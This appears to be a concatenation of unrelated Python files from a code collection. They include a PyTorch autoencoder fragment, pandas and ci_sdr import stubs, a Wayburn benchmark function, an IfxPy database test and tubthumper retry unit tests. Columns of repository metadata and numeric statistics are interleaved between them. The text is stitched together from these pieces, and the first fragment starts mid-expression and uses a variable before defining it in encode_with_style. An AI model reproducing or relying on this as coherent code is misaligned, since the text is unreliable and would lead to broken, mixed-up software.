output_padding=(1, 0), bias=False),
norm_layer(32),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(32, 16, 4, stride=2, padding=1, bias=False),
norm_layer(16),
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(16, 16, 4, stride=2, padding=1, bias=False),
norm_layer(16),
nn.LeakyReLU(0.2),
nn.Conv2d(16, 1, 3, 1, 1)
)
def forward(self, imgs, real=False, full=False):
z_s = self.encode(imgs)
if full:
reconsts_center = self.decode(z_s, real=real, sides='center').clone().detach()
reconsts_left = self.decode(z_s, sides='left').clone().detach()
reconsts_right = self.decode(z_s, sides='right').clone().detach()
return torch.cat((reconsts_left, reconsts_center, reconsts_right), 3)
else:
return self.decode(z_s, real=real, sides='center')
def encode(self, imgs):
return self.encoder(imgs)
def encode_with_style(self, imgs, real=False):
if real:
return self.encoder(imgs) + self.sample(z_s.shape)
else:
return self.encoder(imgs)
def sample(self, s):
std = torch.exp(self.logvar.weight[0].expand(s))
eps = torch.randn_like(std)
return eps * std + self.mu.weight[0].expand(s)
def decode(self, z_s, real=False, sides='center'):
if sides == 'center':
if real:
# return self.decode(z_s + self.sample(z_s.shape))
return self.decoder_style(z_s + self.sample(z_s.shape))
else:
return self.decoder(z_s)
if sides == 'right':
return self.sides_head_right(z_s)
elif sides == 'left':
return self.sides_head_left(z_s)
| 32.833871
| 97
| 0.489537
| 4,740
| 40,714
| 4.075738
| 0.043038
| 0.049692
| 0.07019
| 0.076039
| 0.888141
| 0.875925
| 0.862001
| 0.843574
| 0.825612
| 0.811377
| 0
| 0.081272
| 0.389227
| 40,714
| 1,239
| 98
| 32.860371
| 0.695621
| 0.029941
| 0
| 0.846392
| 0
| 0
| 0.007302
| 0
| 0
| 0
| 0
| 0.000807
| 0
| 1
| 0.049485
| false
| 0
| 0.005155
| 0.009278
| 0.114433
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9c15a5ebfe0f22706a8eb0f17fc5fa6570af6a61
| 231
|
py
|
Python
|
App/dist/coffeegrindsize.app/Contents/Resources/lib/python3.7/pandas/core/groupby/__init__.py
|
tanerqy/coffeegrindsize
|
57f6c48213afda2704478b3fc2d0749332ca9d0e
|
[
"MIT"
] | 6,989
|
2017-07-18T06:23:18.000Z
|
2022-03-31T15:58:36.000Z
|
Library/lib/python3.7/site-packages/pandas-0.24.2-py3.7-macosx-10.9-x86_64.egg/pandas/core/groupby/__init__.py
|
gengyong/Carnets
|
8930a14f69360d4db115a85ff9e0f6efa80fa2e7
|
[
"BSD-3-Clause"
] | 1,978
|
2017-07-18T09:17:58.000Z
|
2022-03-31T14:28:43.000Z
|
Library/lib/python3.7/site-packages/pandas-0.24.2-py3.7-macosx-10.9-x86_64.egg/pandas/core/groupby/__init__.py
|
gengyong/Carnets
|
8930a14f69360d4db115a85ff9e0f6efa80fa2e7
|
[
"BSD-3-Clause"
] | 1,228
|
2017-07-18T09:03:13.000Z
|
2022-03-29T05:57:40.000Z
|
from pandas.core.groupby.groupby import GroupBy # noqa: F401
from pandas.core.groupby.generic import ( # noqa: F401
SeriesGroupBy, DataFrameGroupBy, PanelGroupBy)
from pandas.core.groupby.grouper import Grouper # noqa: F401
| 46.2
| 61
| 0.78355
| 29
| 231
| 6.241379
| 0.413793
| 0.165746
| 0.232044
| 0.348066
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.045
| 0.134199
| 231
| 4
| 62
| 57.75
| 0.86
| 0.138528
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9c3368b534a08b87f1f3d1cee465600232dc6fc4
| 5,725
|
py
|
Python
|
MDAF/TestFunctions/Wayburn.py
|
ejeanboris/MDAF_COMPLETE
|
e99c9762ea7304acc0a6795d33a55449a9800d89
|
[
"CC0-1.0"
] | 1
|
2020-12-30T23:04:51.000Z
|
2020-12-30T23:04:51.000Z
|
MDAF/TestFunctions/Wayburn.py
|
ejeanboris/MDAF_COMPLETE
|
e99c9762ea7304acc0a6795d33a55449a9800d89
|
[
"CC0-1.0"
] | null | null | null |
MDAF/TestFunctions/Wayburn.py
|
ejeanboris/MDAF_COMPLETE
|
e99c9762ea7304acc0a6795d33a55449a9800d89
|
[
"CC0-1.0"
] | null | null | null |
import math
def main(args):
'''
>>> main([1,2])<0.001
True
#_# dimmensions: 2
#_# upper: 100
#_# lower: -100
#_# minimum: [-2.903534,-2.903534]
#_# opti: 0
#_# cm_angle: array([[ 16.51016476], [ 2.57287474], [ 17.61177277], [ 2.41471473], [142.5140382 ], [ 28.5868278 ], [ 0.26952628], [ 0.39099627], [ 0. ], [ 0.369 ]])
#_# cm_conv: array([[0.25 ], [0.09615385], [0.76923077], [0.23076923], [0. ], [0.064 ]])
#_# cm_grad: array([[0.66097771], [0.08800919], [0. ], [0.164 ]])
#_# ela_conv: array([[ 1.0000000e+00], [ 0.0000000e+00], [-5.7208316e+22], [ 5.7208316e+22], [ 1.0000000e+03], [ 6.5400000e-01]])
#_# ela_curv: array([[9.80882101e+07], [3.16831680e+16], [9.56909760e+21], [4.39318384e+19], [4.65778139e+21], [1.08965948e+23], [2.20727784e+22], [0.00000000e+00], [1.09553821e+00], [2.16967897e+02], [6.96768470e+06], [5.52099617e+03], [3.60451882e+04], [1.29249630e+09], [9.18573153e+07], [1.00000000e-02], [1.20728457e+00], [1.26787937e+03], [6.72779142e+26], [1.64545038e+04], [8.27264290e+04], [1.33092866e+29], [9.41113552e+27], [0.00000000e+00], [8.38800000e+03], [9.67900000e+00]])
#_# ela_distr: array([[ 2.95537956], [ 8.41879344], [16. ], [ 0. ], [ 0.26 ]])
#_# ela_local: array([[9.00000000e+01], [9.00000000e-01], [1.60765038e-03], [3.23996011e-01], [1.00000000e-02], [1.11235955e-02], [1.00000000e-02], [2.55000000e+02], [3.38750000e+02], [4.20500000e+02], [4.15000000e+02], [4.75000000e+02], [1.28500000e+03], [1.25582481e+02], [4.21400000e+04], [1.53870000e+01]])
#_# ela_meta: array([[-5.84568182e-03], [ 7.68635555e+22], [ 5.31065144e+18], [ 4.88899306e+19], [ 9.20601382e+00], [-6.16929073e-03], [ 5.52437887e-01], [ 2.37186991e+01], [ 5.55065780e-01], [ 0.00000000e+00], [ 1.30000000e-02]])
#_# basic: array([[ 2.00000000e+00], [ 5.00000000e+02], [-1.00000000e+02], [-1.00000000e+02], [ 1.00000000e+02], [ 1.00000000e+02], [ 3.10691301e+07], [ 9.80481050e+23], [ 6.00000000e+00], [ 6.00000000e+00], [ 3.60000000e+01], [ 3.60000000e+01], [ 1.00000000e+00], [ 0.00000000e+00], [ 1.00000000e-03]])
#_# disp: array([[ 1.79472172e-01], [ 3.04971872e-01], [ 4.35404768e-01], [ 6.95890946e-01], [ 1.59018558e-01], [ 2.71378354e-01], [ 3.84165922e-01], [ 6.16352427e-01], [-8.57228823e+01], [-7.26115707e+01], [-5.89848741e+01], [-3.17711402e+01], [-8.62321072e+01], [-7.47110183e+01], [-6.31460666e+01], [-3.93382505e+01], [ 0.00000000e+00], [ 1.20000000e-02]])
#_# limo: array([[ 2.36717207e+20], [ 4.07457578e-02], [ 7.98525673e+21], [ 1.14416298e+22], [ 1.19946513e-01], [-3.26380292e-02], [ 2.69245754e+01], [ 6.64423242e+01], [ 1.19653395e+01], [ 6.08626247e+00], [ 7.56713964e+21], [ 5.82114762e-01], [ 0.00000000e+00], [ 5.90000000e-02]])
#_# nbc: array([[ 0.88092555], [ 0.92477452], [ 0.64327624], [ 0.11440441], [-0.24261939], [ 0. ], [ 0.044 ]])
#_# pca: array([[1. ], [1. ], [0.33333333], [1. ], [0.51039617], [0.51039564], [1. ], [0.34226913], [0. ], [0.003 ]])
#_# gcm: array([[1. ], [0.02777778], [0.97222222], [0. ], [1. ], [1. ], [1. ], [1. ], [ nan], [1. ], [1. ], [1. ], [1. ], [ nan], [1. ], [1. ], [1. ], [1. ], [1. ], [ nan], [1. ], [1. ], [0.02777778], [0. ], [0.037 ], [3. ], [0.08333333], [0.91666667], [0.83333333], [0.2179862 ], [0.33333333], [0.37721563], [0.40479817], [0.10084106], [0.05555556], [0.05555556], [0.05555556], [0.05555556], [0. ], [0.16666667], [0.16666667], [0.33333333], [0.33333333], [0.5 ], [0.16666667], [1. ], [0.40479817], [0.02777778], [0. ], [0.043 ], [1. ], [0.02777778], [0.97222222], [0. ], [1. ], [1. ], [1. ], [1. ], [ nan], [1. ], [1. ], [1. ], [1. ], [ nan], [1. ], [1. ], [1. ], [1. ], [1. ], [ nan], [1. ], [1. ], [0.02777778], [0. ], [0.046 ]])
#_# ic: array([[4.67671036e-01], [ nan], [9.97697764e+13], [1.50000000e+01], [3.69477912e-01], [0.00000000e+00], [3.74000000e-01]])
#_# Represented: 1
'''
return (args[0]**6 + args[1]**4 - 17)**2 + (2*args[0] + args[1] - 4)**2
if __name__ == "__main__":
import doctest
doctest.testmod()
| 146.794872
| 1,511
| 0.39441
| 601
| 5,725
| 3.695507
| 0.334443
| 0.020711
| 0.01891
| 0.014408
| 0.106258
| 0.092751
| 0.092751
| 0.076092
| 0.076092
| 0.076092
| 0
| 0.519758
| 0.39441
| 5,725
| 38
| 1,512
| 150.657895
| 0.120854
| 0.973974
| 0
| 0
| 0
| 0
| 0.044693
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0.333333
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9c4b40af716d60ff1006f427bbb9d15ca53e1a06
| 6,083
|
py
|
Python
|
IfxPy/tests/test_161_FetchBothNestedSelects_01.py
|
jaimundada/IfxPy
|
e6941d77051933dfe6affd3b096ea6d8f485ae9b
|
[
"Apache-2.0"
] | 39
|
2017-09-25T00:10:23.000Z
|
2022-02-10T22:03:36.000Z
|
IfxPy/tests/test_161_FetchBothNestedSelects_01.py
|
jaimundada/IfxPy
|
e6941d77051933dfe6affd3b096ea6d8f485ae9b
|
[
"Apache-2.0"
] | 58
|
2018-05-11T09:45:45.000Z
|
2022-03-10T10:27:01.000Z
|
IfxPy/tests/test_161_FetchBothNestedSelects_01.py
|
jaimundada/IfxPy
|
e6941d77051933dfe6affd3b096ea6d8f485ae9b
|
[
"Apache-2.0"
] | 22
|
2018-02-02T12:41:18.000Z
|
2022-02-24T14:29:17.000Z
|
#
#
#
import unittest, sys
import IfxPy
import config
from testfunctions import IfxPyTestFunctions
class IfxPyTestCase(unittest.TestCase):
def test_161_FetchBothNestedSelects_01(self):
obj = IfxPyTestFunctions()
obj.assert_expect(self.run_test_161)
def run_test_161(self):
conn = IfxPy.connect(config.ConnStr, config.user, config.password)
server = IfxPy.server_info( conn )
if (server.DBMS_NAME[0:3] == 'Inf'):
op = {IfxPy.ATTR_CASE: IfxPy.CASE_UPPER}
IfxPy.set_option(conn, op, 1)
result = IfxPy.exec_immediate(conn, "select * from emp_act order by projno desc")
row = IfxPy.fetch_both(result)
count = 1
while ( row ):
print("Record",count,": %6s %-6s %3d %9s %10s %10s %6s " % (row[0], row[1], row[2], row['EMPTIME'], row['EMSTDATE'], row['EMENDATE'], row[0]))
result2 = IfxPy.exec_immediate(conn,"select * from employee where employee.empno='" + row['EMPNO'] + "'")
row2 = IfxPy.fetch_both(result2)
if row2:
print(">>%s,%s,%s,%s,%s,%s,%s" % (row2['EMPNO'], row2['FIRSTNME'],row2['MIDINIT'], row2[3], row2[3], row2[5], row2[6]))
count = count + 1
if (count > 10):
break
row = IfxPy.fetch_both(result)
#__END__
#__LUW_EXPECTED__
#Record 1 : 000020 PL2100 30 1.00 1982-01-01 1982-09-15 000020
#>>000020,MICHAEL,L,THOMPSON,THOMPSON,3476,1973-10-10
#Record 2 : 000020 PL2100 30 1.00 1982-01-01 1982-09-15 000020
#>>000020,MICHAEL,L,THOMPSON,THOMPSON,3476,1973-10-10
#Record 3 : 000340 OP2013 140 0.50 1982-01-01 1983-02-01 000340
#>>000340,JASON,R,GOUNOT,GOUNOT,5698,1947-05-05
#Record 4 : 000340 OP2013 170 0.50 1982-01-01 1983-02-01 000340
#>>000340,JASON,R,GOUNOT,GOUNOT,5698,1947-05-05
#Record 5 : 000330 OP2012 140 0.25 1982-01-01 1983-02-01 000330
#>>000330,WING, ,LEE,LEE,2103,1976-02-23
#Record 6 : 000330 OP2012 160 0.75 1982-01-01 1983-02-01 000330
#>>000330,WING, ,LEE,LEE,2103,1976-02-23
#Record 7 : 000320 OP2011 140 0.75 1982-01-01 1983-02-01 000320
#>>000320,RAMLAL,V,MEHTA,MEHTA,9990,1965-07-07
#Record 8 : 000320 OP2011 150 0.25 1982-01-01 1983-02-01 000320
#>>000320,RAMLAL,V,MEHTA,MEHTA,9990,1965-07-07
#Record 9 : 000050 OP2010 10 0.75 1982-01-01 1983-02-01 000050
#>>000050,JOHN,B,GEYER,GEYER,6789,1949-08-17
#Record 10 : 000100 OP2010 10 1.00 1982-01-01 1983-02-01 000100
#>>000100,THEODORE,Q,SPENSER,SPENSER,0972,1980-06-19
#__ZOS_EXPECTED__
#Record 1 : 000020 PL2100 30 1.00 1982-01-01 1982-09-15 000020
#>>000020,MICHAEL,L,THOMPSON,THOMPSON,3476,1973-10-10
#Record 2 : 000020 PL2100 30 1.00 1982-01-01 1982-09-15 000020
#>>000020,MICHAEL,L,THOMPSON,THOMPSON,3476,1973-10-10
#Record 3 : 000340 OP2013 170 0.50 1982-01-01 1983-02-01 000340
#>>000340,JASON,R,GOUNOT,GOUNOT,5698,1947-05-05
#Record 4 : 000340 OP2013 140 0.50 1982-01-01 1983-02-01 000340
#>>000340,JASON,R,GOUNOT,GOUNOT,5698,1947-05-05
#Record 5 : 000330 OP2012 160 0.75 1982-01-01 1983-02-01 000330
#>>000330,WING, ,LEE,LEE,2103,1976-02-23
#Record 6 : 000330 OP2012 140 0.25 1982-01-01 1983-02-01 000330
#>>000330,WING, ,LEE,LEE,2103,1976-02-23
#Record 7 : 000320 OP2011 150 0.25 1982-01-01 1983-02-01 000320
#>>000320,RAMLAL,V,MEHTA,MEHTA,9990,1965-07-07
#Record 8 : 000320 OP2011 140 0.75 1982-01-01 1983-02-01 000320
#>>000320,RAMLAL,V,MEHTA,MEHTA,9990,1965-07-07
#Record 9 : 000100 OP2010 10 1.00 1982-01-01 1983-02-01 000100
#>>000100,THEODORE,Q,SPENSER,SPENSER,0972,1980-06-19
#Record 10 : 000050 OP2010 10 0.75 1982-01-01 1983-02-01 000050
#>>000050,JOHN,B,GEYER,GEYER,6789,1949-08-17
#__SYSTEMI_EXPECTED__
#Record 1 : 000020 PL2100 30 1.00 1982-01-01 1982-09-15 000020
#>>000020,MICHAEL,L,THOMPSON,THOMPSON,3476,1973-10-10
#Record 2 : 000020 PL2100 30 1.00 1982-01-01 1982-09-15 000020
#>>000020,MICHAEL,L,THOMPSON,THOMPSON,3476,1973-10-10
#Record 3 : 000340 OP2013 140 0.50 1982-01-01 1983-02-01 000340
#>>000340,JASON,R,GOUNOT,GOUNOT,5698,1947-05-05
#Record 4 : 000340 OP2013 170 0.50 1982-01-01 1983-02-01 000340
#>>000340,JASON,R,GOUNOT,GOUNOT,5698,1947-05-05
#Record 5 : 000330 OP2012 140 0.25 1982-01-01 1983-02-01 000330
#>>000330,WING, ,LEE,LEE,2103,1976-02-23
#Record 6 : 000330 OP2012 160 0.75 1982-01-01 1983-02-01 000330
#>>000330,WING, ,LEE,LEE,2103,1976-02-23
#Record 7 : 000320 OP2011 140 0.75 1982-01-01 1983-02-01 000320
#>>000320,RAMLAL,V,MEHTA,MEHTA,9990,1965-07-07
#Record 8 : 000320 OP2011 150 0.25 1982-01-01 1983-02-01 000320
#>>000320,RAMLAL,V,MEHTA,MEHTA,9990,1965-07-07
#Record 9 : 000050 OP2010 10 0.75 1982-01-01 1983-02-01 000050
#>>000050,JOHN,B,GEYER,GEYER,6789,1949-08-17
#Record 10 : 000100 OP2010 10 1.00 1982-01-01 1983-02-01 000100
#>>000100,THEODORE,Q,SPENSER,SPENSER,0972,1980-06-19
#__IDS_EXPECTED__
#Record 1 : 000020 PL2100 30 1.00 1982-01-01 1982-09-15 000020
#>>000020,MICHAEL,L,THOMPSON,THOMPSON,3476,1973-10-10
#Record 2 : 000020 PL2100 30 1.00 1982-01-01 1982-09-15 000020
#>>000020,MICHAEL,L,THOMPSON,THOMPSON,3476,1973-10-10
#Record 3 : 000340 OP2013 140 0.50 1982-01-01 1983-02-01 000340
#>>000340,JASON,R,GOUNOT,GOUNOT,5698,1947-05-05
#Record 4 : 000340 OP2013 170 0.50 1982-01-01 1983-02-01 000340
#>>000340,JASON,R,GOUNOT,GOUNOT,5698,1947-05-05
#Record 5 : 000330 OP2012 140 0.25 1982-01-01 1983-02-01 000330
#>>000330,WING, ,LEE,LEE,2103,1976-02-23
#Record 6 : 000330 OP2012 160 0.75 1982-01-01 1983-02-01 000330
#>>000330,WING, ,LEE,LEE,2103,1976-02-23
#Record 7 : 000320 OP2011 140 0.75 1982-01-01 1983-02-01 000320
#>>000320,RAMLAL,V,MEHTA,MEHTA,9990,1965-07-07
#Record 8 : 000320 OP2011 150 0.25 1982-01-01 1983-02-01 000320
#>>000320,RAMLAL,V,MEHTA,MEHTA,9990,1965-07-07
#Record 9 : 000100 OP2010 10 1.00 1982-01-01 1983-02-01 000100
#>>000100,THEODORE,Q,SPENSER,SPENSER,0972,1980-06-19
#Record 10 : 000050 OP2010 10 0.75 1982-01-01 1983-02-01 000050
#>>000050,JOHN,B,GEYER,GEYER,6789,1949-08-17
| 48.664
| 149
| 0.682065
| 1,090
| 6,083
| 3.766972
| 0.136697
| 0.058451
| 0.077935
| 0.093522
| 0.838042
| 0.826839
| 0.809547
| 0.809547
| 0.809547
| 0.809547
| 0
| 0.455961
| 0.165708
| 6,083
| 124
| 150
| 49.056452
| 0.353103
| 0.767878
| 0
| 0.074074
| 0
| 0
| 0.151927
| 0.016629
| 0
| 0
| 0
| 0
| 0.037037
| 1
| 0.074074
| false
| 0.037037
| 0.148148
| 0
| 0.259259
| 0.074074
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9c78c6f7cb61b966ce06c55bf83a922836d55b06
| 53
|
py
|
Python
|
ci_sdr/pt/__init__.py
|
boeddeker/ci_sdr
|
e1b5c1f9b25baab91f04eb2c96ed392cf0b313cd
|
[
"MIT"
] | 38
|
2021-01-16T22:59:42.000Z
|
2022-03-06T12:34:33.000Z
|
ci_sdr/pt/__init__.py
|
boeddeker/ci_sdr
|
e1b5c1f9b25baab91f04eb2c96ed392cf0b313cd
|
[
"MIT"
] | 2
|
2021-01-26T16:25:26.000Z
|
2021-05-27T08:07:09.000Z
|
ci_sdr/pt/__init__.py
|
boeddeker/ci_sdr
|
e1b5c1f9b25baab91f04eb2c96ed392cf0b313cd
|
[
"MIT"
] | 7
|
2021-01-18T01:43:38.000Z
|
2021-06-23T12:06:49.000Z
|
from .sdr import ci_sdr
from .sdr import ci_sdr_loss
| 17.666667
| 28
| 0.811321
| 11
| 53
| 3.636364
| 0.454545
| 0.35
| 0.65
| 0.75
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.150943
| 53
| 2
| 29
| 26.5
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
9c7bfba715ee90a3390b4067134768e01b4660c9
| 31,870
|
py
|
Python
|
test/unit_tests/test_retry_factory.py
|
matteosox/tubthumper
|
4213b65ac42c68a9105ce691760cea6bb329ca71
|
[
"Apache-2.0"
] | 2
|
2021-10-17T06:29:56.000Z
|
2022-02-24T13:10:13.000Z
|
test/unit_tests/test_retry_factory.py
|
matteosox/tubthumper
|
4213b65ac42c68a9105ce691760cea6bb329ca71
|
[
"Apache-2.0"
] | 11
|
2021-10-09T05:18:21.000Z
|
2022-01-04T23:08:19.000Z
|
test/unit_tests/test_retry_factory.py
|
matteosox/tubthumper
|
4213b65ac42c68a9105ce691760cea6bb329ca71
|
[
"Apache-2.0"
] | null | null | null |
"""Unit tests for the function retry_decorator"""
# pylint: disable=too-many-public-methods
import inspect
import logging
import random
import unittest
from mock import AsyncMock, Mock
from tubthumper import RetryError, retry_factory
from . import constants, util
tubthumper_logger = logging.getLogger("tubthumper")
tubthumper_logger.setLevel(logging.ERROR) # silence warnings from retries
class TestRetryFactoryAsync(util.IsolatedAsyncioTestCase):
"""Test case for retry factory with coroutines"""
async def test_coroutine_success(self):
"""Test success of a simple coroutine passed into retry"""
return_value = 1
func = AsyncMock(return_value=return_value)
wrapped_func = retry_factory(func, exceptions=constants.TestException)
result = await wrapped_func()
self.assertEqual(result, return_value)
func.assert_awaited_once_with()
@staticmethod
async def test_coroutine_call():
"""Test coroutine is called with appropriate arguments"""
func = AsyncMock()
wrapped_func = retry_factory(func, exceptions=constants.TestException)
await wrapped_func(*constants.ARGS, **constants.KWARGS)
func.assert_awaited_once_with(*constants.ARGS, **constants.KWARGS)
async def test_single_exception(self):
"""Test providing a single exception to catch is caught and retried"""
func = AsyncMock(side_effect=constants.TestException)
wrapped_func = retry_factory(
func, exceptions=constants.TestException, retry_limit=1, init_backoff=0
)
with self.assertRaises(RetryError):
await wrapped_func()
self.assertEqual(func.await_count, 2)
async def test_diff_single_exception(self):
"""Test providing a single exception and throwing a different one is not caught and retried"""
side_effect = TypeError
func = AsyncMock(side_effect=side_effect)
wrapped_func = retry_factory(
func, exceptions=constants.TestException, retry_limit=1
)
with self.assertRaises(side_effect):
await wrapped_func()
func.assert_awaited_once_with()
async def test_multiple_exceptions(self):
"""Test providing a tuple of exceptions and throwing one of them is caught and retried"""
exceptions = (constants.TestException, TypeError)
func = AsyncMock(side_effect=constants.TestException)
wrapped_func = retry_factory(
func, exceptions=exceptions, retry_limit=1, init_backoff=0
)
with self.assertRaises(RetryError):
await wrapped_func()
self.assertEqual(func.await_count, 2)
async def test_diff_multiple_exceptions(self):
"""Test providing a tuple of exceptions and throwing a different one is not caught and retried"""
exceptions = (ValueError, TypeError)
func = AsyncMock(side_effect=constants.TestException)
wrapped_func = retry_factory(func, exceptions=exceptions, retry_limit=1)
with self.assertRaises(constants.TestException):
await wrapped_func()
func.assert_awaited_once_with()
async def test_reraise(self):
"""Test that setting reraise to True results in raising the caught exception, not RetryError"""
func = AsyncMock(side_effect=constants.TestException)
wrapped_func = retry_factory(
func,
reraise=True,
retry_limit=1,
init_backoff=0,
exceptions=constants.TestException,
)
with self.assertRaises(constants.TestException):
await wrapped_func()
self.assertEqual(func.await_count, 2)
async def test_reraise_with_time_limit(self):
"""Test that setting reraise to True with a time limit results in raising the caught exception, not RetryError"""
func = AsyncMock(side_effect=constants.TestException)
wrapped_func = retry_factory(
func,
reraise=True,
time_limit=0,
exceptions=constants.TestException,
)
with self.assertRaises(constants.TestException):
await wrapped_func()
self.assertEqual(func.await_count, 1)
async def test_retry_limit_0(self):
"""Test retry_limit set to 0 calls function once and raises RetryError"""
func = AsyncMock(side_effect=constants.TestException)
wrapped_func = retry_factory(
func, retry_limit=0, exceptions=constants.TestException
)
with self.assertRaises(RetryError):
await wrapped_func()
func.assert_awaited_once_with()
async def test_time_limit(self):
"""Test that setting a time_limit results in a RetryError"""
func = AsyncMock(side_effect=constants.TestException)
wrapped_func = retry_factory(
func, time_limit=0, exceptions=constants.TestException
)
with self.assertRaises(RetryError):
await wrapped_func()
func.assert_awaited_once_with()
async def test_jitter(self):
"""Test jitter results in random variation in backoff time, predictable thanks to setting the random seed"""
func = util.timed_mock(async_mock=True, side_effect=constants.TestException)
wrapped_func = retry_factory(
func, retry_limit=1, exceptions=constants.TestException
)
random.seed(constants.RANDOM_SEED)
with self.assertRaises(RetryError):
await wrapped_func()
self.assertEqual(func.await_count, 2)
duration = func.call_times[1] - func.call_times[0]
util.assert_time(self, duration, constants.RANDOM_QUANTITY)
async def test_init_backoff(self):
"""Test init_backoff results in appropriate backoff time"""
init_backoff = 0.01
func = util.timed_mock(async_mock=True, side_effect=constants.TestException)
wrapped_func = retry_factory(
func,
init_backoff=init_backoff,
retry_limit=1,
jitter=False,
exceptions=constants.TestException,
)
with self.assertRaises(RetryError):
await wrapped_func()
self.assertEqual(func.await_count, 2)
duration = func.call_times[1] - func.call_times[0]
util.assert_time(self, duration, init_backoff)
async def test_exponential_backoff(self):
"""Test default exponential backoff time"""
init_backoff = 0.01
func = util.timed_mock(async_mock=True, side_effect=constants.TestException)
wrapped_func = retry_factory(
func,
init_backoff=init_backoff,
retry_limit=2,
jitter=False,
exceptions=constants.TestException,
)
with self.assertRaises(RetryError):
await wrapped_func()
self.assertEqual(func.await_count, 3)
util.assert_time(self, func.call_times[1] - func.call_times[0], init_backoff)
util.assert_time(
self, func.call_times[2] - func.call_times[1], 2 * init_backoff
)
async def test_custom_exponential_backoff(self):
"""Test custom exponential backoff time"""
init_backoff = 0.01
exponential = 1.5
func = util.timed_mock(async_mock=True, side_effect=constants.TestException)
wrapped_func = retry_factory(
func,
init_backoff=init_backoff,
exponential=exponential,
retry_limit=2,
jitter=False,
exceptions=constants.TestException,
)
with self.assertRaises(RetryError):
await wrapped_func()
self.assertEqual(func.await_count, 3)
util.assert_time(self, func.call_times[1] - func.call_times[0], init_backoff)
util.assert_time(
self, func.call_times[2] - func.call_times[1], exponential * init_backoff
)
async def test_logging(self):
"""Test retrying a function results in a warning log statement"""
func = AsyncMock(side_effect=constants.TestException)
wrapped_func = retry_factory(
func, exceptions=constants.TestException, retry_limit=1, init_backoff=0
)
with self.assertRaises(RetryError):
with self.assertLogs(logger=tubthumper_logger, level=logging.WARNING):
await wrapped_func()
self.assertEqual(func.await_count, 2)
async def test_custom_logging_level(self):
"""Test that setting a custom log level works"""
level = logging.INFO
func = AsyncMock(side_effect=constants.TestException)
wrapped_func = retry_factory(
func,
exceptions=constants.TestException,
retry_limit=1,
init_backoff=0,
log_level=level,
)
with self.assertRaises(RetryError):
with self.assertLogs(logger=tubthumper_logger, level=level):
await wrapped_func()
self.assertEqual(func.await_count, 2)
async def test_custom_logger(self):
"""Test that supplying a custom logger works"""
logger = logging.getLogger(__name__)
func = AsyncMock(side_effect=constants.TestException)
wrapped_func = retry_factory(
func, exceptions=constants.TestException, retry_limit=1, init_backoff=0
)
with self.assertRaises(RetryError):
with self.assertLogs(logger=logger, level=logging.WARNING):
await wrapped_func()
self.assertEqual(func.await_count, 2)
async def test_method_of_object(self):
"""Test retry and correct call structure for wrapping an object's async method"""
class _Class:
method = util.create_method_mock(
async_mock=True, side_effect=constants.TestException
)
obj = _Class()
func = obj.method
wrapped_func = retry_factory(
func,
retry_limit=1,
init_backoff=0,
exceptions=constants.TestException,
)
with self.assertRaises(RetryError):
await wrapped_func(*constants.ARGS, **constants.KWARGS)
self.assertEqual(func.await_count, 2)
func.assert_called_with(obj, *constants.ARGS, **constants.KWARGS)
async def test_method_of_class(self):
"""Test retry and correct call structure for wrapping a class's async method"""
class _Class:
method = util.create_method_mock(
async_mock=True, side_effect=constants.TestException
)
func = _Class.method
wrapped_func = retry_factory(
func,
retry_limit=1,
init_backoff=0,
exceptions=constants.TestException,
)
with self.assertRaises(RetryError):
await wrapped_func(*constants.ARGS, **constants.KWARGS)
self.assertEqual(func.await_count, 2)
func.assert_called_with(*constants.ARGS, **constants.KWARGS)
async def test_classmethod_of_object(self):
"""Test retry and correct call structure for wrapping an object's async classmethod"""
class _Class:
method = classmethod(
util.create_method_mock(
async_mock=True, side_effect=constants.TestException
)
)
obj = _Class()
func = obj.method
wrapped_func = retry_factory(
func,
retry_limit=1,
init_backoff=0,
exceptions=constants.TestException,
)
with self.assertRaises(RetryError):
await wrapped_func(*constants.ARGS, **constants.KWARGS)
self.assertEqual(func.await_count, 2)
func.assert_called_with(_Class, *constants.ARGS, **constants.KWARGS)
async def test_classmethod_of_class(self):
"""Test retry and correct call structure for wrapping a class's async classmethod"""
class _Class:
method = classmethod(
util.create_method_mock(
async_mock=True, side_effect=constants.TestException
)
)
func = _Class.method
wrapped_func = retry_factory(
func,
retry_limit=1,
init_backoff=0,
exceptions=constants.TestException,
)
with self.assertRaises(RetryError):
await wrapped_func(*constants.ARGS, **constants.KWARGS)
